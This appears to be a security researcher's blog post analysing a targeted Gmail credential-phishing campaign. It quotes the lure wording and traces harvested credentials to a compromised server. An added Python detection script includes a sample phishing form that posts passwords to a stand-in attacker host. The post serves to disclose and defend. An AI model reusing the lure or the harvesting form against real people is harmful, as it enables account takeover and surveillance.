I received a phishing email sample indicating that the attackers described in the above post continue their efforts with only very slight modifications to the original themes, and I must note that this incident is even simpler than the previous one. I don't know whether any accounts were compromised this time; I hope the public disclosure of the previous attacks, along with the notes on forwarding rules and two-factor authentication in Gmail, helped prevent most if not all compromises.

P.S. Google are aware of this; there is not much they can do to prevent these from coming in, but I am sure they are trying. If you are concerned about your account safety, please use two-factor authentication and change your passwords often.

Distribution and targets: Email link; a targeted phishing message sent to the Gmail account of a person associated with political and international affairs (in this case). Links are customized and individualized for each target. The sender is a spoofed address of a very close associate.

Attack approach: Victims get a message from a spoofed address of a close associate or a collaborating organization/agency. The message is crafted to look like a subscription form asking for Gmail credentials to activate it. Given that many services use Google login for authentication, this is not expected to alarm the recipient. As soon as credentials are entered, the following happens:

1. Credentials get posted / sent to a server in Houston, TX.
2. The recipient is redirected back to Gmail, already logged in, so ends up back in the inbox.
3. Attackers log in to the compromised account within a few hours and then at least twice daily to check and read mail.

Note: no forwarding rules were set up by attackers for the duration of the testing.

Your account will be locked for unusual account activity, which includes, but is not limited to:
1. Receiving, deleting, or downloading large amounts of mail via POP or IMAP in a short period of time.
2. Sending a large number of undeliverable messages (messages that bounce back).
3. Using file-sharing or file-storage software, browser extensions, or third party software that automatically logs in to your account.
4. Leaving multiple instances of Gmail open.
Browser-related issues. Please note that if you find your browser continually reloading while attempting to access your Inbox, it's probably a browser issue, and it may be necessary to clear your browser's cache and cookies. Please log in the Gmail Server to activate your account:

Headers and sender

The HTML code of the email is Base64 encoded; decoding it yields the form above, with the recipient's login name already hardcoded into it.

--------------------------------------

Credential harvest

Decoded form HTML code; the recipient address has been changed to xxxxxxx@gmail.com and all < and > have been replaced with { and }.

*Your account will be locked for unusual account activity, which includes,
but is not limited to:

1. Receiving, deleting, or downloading large amounts of mail via POP or
IMAP in a short period of time.
2. Sending a large number of undeliverable messages (messages that bounce
back).
3. Using file-sharing or file-storage software, browser extensions, or
third party software that automatically logs in to your account.
4. Leaving multiple instances of Gmail open.Browser-related issues.
Please note that if you find your browser continually reloading while
attempting to access your Inbox, it's probably a browser issue, and it may
be necessary to clear your browser's cache and cookies.

{ol}
{li}Receiving, deleting, or downloading large amounts of mail via POP or IM=
AP in a short period of time.{/li}
{li}Sending a large number of undeliverable messages (messages that bounce =
back).{/li}
{li}Using file-sharing or file-storage software, browser extensions, or thi=
rd party software that automatically logs in to your account.{/li}
{li}Leaving multiple instances of Gmail open.Browser-related issues. Please=
note that if you find your browser continually reloading while attempting =
to access your Inbox, it's probably a browser issue, and it may be nece=
ssary to clear your browser's cache and cookies. {/li}
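As an added, defender-side illustration (this is not code from the original post), the following Python script triages a message of the kind described above: it decodes the base64 (or quoted-printable) HTML part with the standard email module, extracts every form, and flags a form that asks for a password, posts to a non-Google host, and is prefilled with the recipient's own address. The raw message, the form action host harvester.example.invalid and both e-mail addresses are constructed placeholders, not values taken from the real sample.

```python
import base64
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not the real phishing sample): a single-part
# text/html body, base64 encoded as described in the post. The form action
# host and both addresses are placeholders.
_FORM_HTML = """<html><body>
<p>Your account will be locked for unusual account activity.</p>
<p>Please log in the Gmail Server to activate your account:</p>
<form method="post" action="http://harvester.example.invalid/activate.php">
  <input type="text" name="Email" value="xxxxxxx@gmail.com">
  <input type="password" name="Passwd">
  <input type="submit" value="Activate">
</form>
</body></html>"""

RAW_MESSAGE = (
    "From: Close Associate <associate@partner-org.example>\r\n"
    "To: xxxxxxx@gmail.com\r\n"
    "Subject: Gmail account activation\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: text/html; charset="utf-8"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n"
    + base64.b64encode(_FORM_HTML.encode("utf-8")).decode("ascii")
    + "\r\n"
)


class FormExtractor(HTMLParser):
    """Collects every <form> with its action URL and <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "type": (a.get("type") or "text").lower(),
                "name": a.get("name") or "",
                "value": a.get("value") or "",
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def decode_html_parts(raw):
    """Parse a raw RFC 822 message; return (message, [decoded HTML parts]).

    get_content() undoes base64 and quoted-printable transfer encodings, so
    the '=' soft line breaks visible in the decoded form are gone here.
    """
    msg = email.message_from_string(raw, policy=policy.default)
    parts = [p.get_content() for p in msg.walk()
             if p.get_content_type() == "text/html"]
    return msg, parts


def is_google_host(host):
    """True only for google.com itself or a subdomain of it."""
    return host == "google.com" or host.endswith(".google.com")


def analyze_message(raw):
    """Return one finding per form found in the message's HTML parts."""
    msg, html_parts = decode_html_parts(raw)
    to_header = msg["To"]
    recipients = {a.addr_spec.lower() for a in to_header.addresses} if to_header else set()
    findings = []
    for html in html_parts:
        extractor = FormExtractor()
        extractor.feed(html)
        for form in extractor.forms:
            host = (urlparse(form["action"]).hostname or "").lower()
            prefilled = {i["value"].lower() for i in form["inputs"] if "@" in i["value"]}
            findings.append({
                "action_host": host,
                "asks_password": any(i["type"] == "password" for i in form["inputs"]),
                "action_off_google": bool(host) and not is_google_host(host),
                "prefilled_recipient": bool(prefilled & recipients),
            })
    return findings


def is_credential_phish(findings):
    """Password form, posting off-Google, prefilled with the recipient's own
    address: the combination the post describes."""
    return any(f["asks_password"] and f["action_off_google"] and f["prefilled_recipient"]
               for f in findings)


if __name__ == "__main__":
    results = analyze_message(RAW_MESSAGE)
    for finding in results:
        print(finding)
    print("credential phish:", is_credential_phish(results))
```

The three signals are deliberately checked together: a prefilled address alone is common in legitimate mail, and an off-Google form alone is common in newsletters, but a password field whose form posts away from Google while already knowing who the recipient is matches exactly the hardcoded-login trick used in this sample.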

Credential compromise testing

In order to test the exploit, I made an account closely resembling the recipient account and filled it with Google alerts about human rights and various military issues, random malicious documents, and mail from China-related Google groups. The result is not very interesting for a spy but more or less plausible.

I changed the hardcoded Gmail ID of the target in the HTML code and entered the new account's credentials into the resulting "activate" form.

The resulting traffic is as follows:

www.softechglobal.com (70.86.21.146) appears to be a legitimate company whose website is hosted at ThePlanet.com Internet Services, and that server is compromised.

70.86.21.146
92.15.5646.static.theplanet.com
Host reachable, 48 ms. average

70.84.0.0 - 70.87.255.255
ThePlanet.com Internet Services, Inc.
315 Capitol, Suite 205
Houston, TX 77002
United States

--------------------------------------

www.softechglobal.com Hosting history

1 comment:

The other thing to look for is a forward set up on your account to another email. At least with human rights activists this was a common tactic so the attackers didn't need to log back into compromised accounts.

Malware samples are available for download by any responsible whitehat researcher. By downloading the samples, anyone waives all rights to claim punitive, incidental and consequential damages resulting from mishandling or self-infection.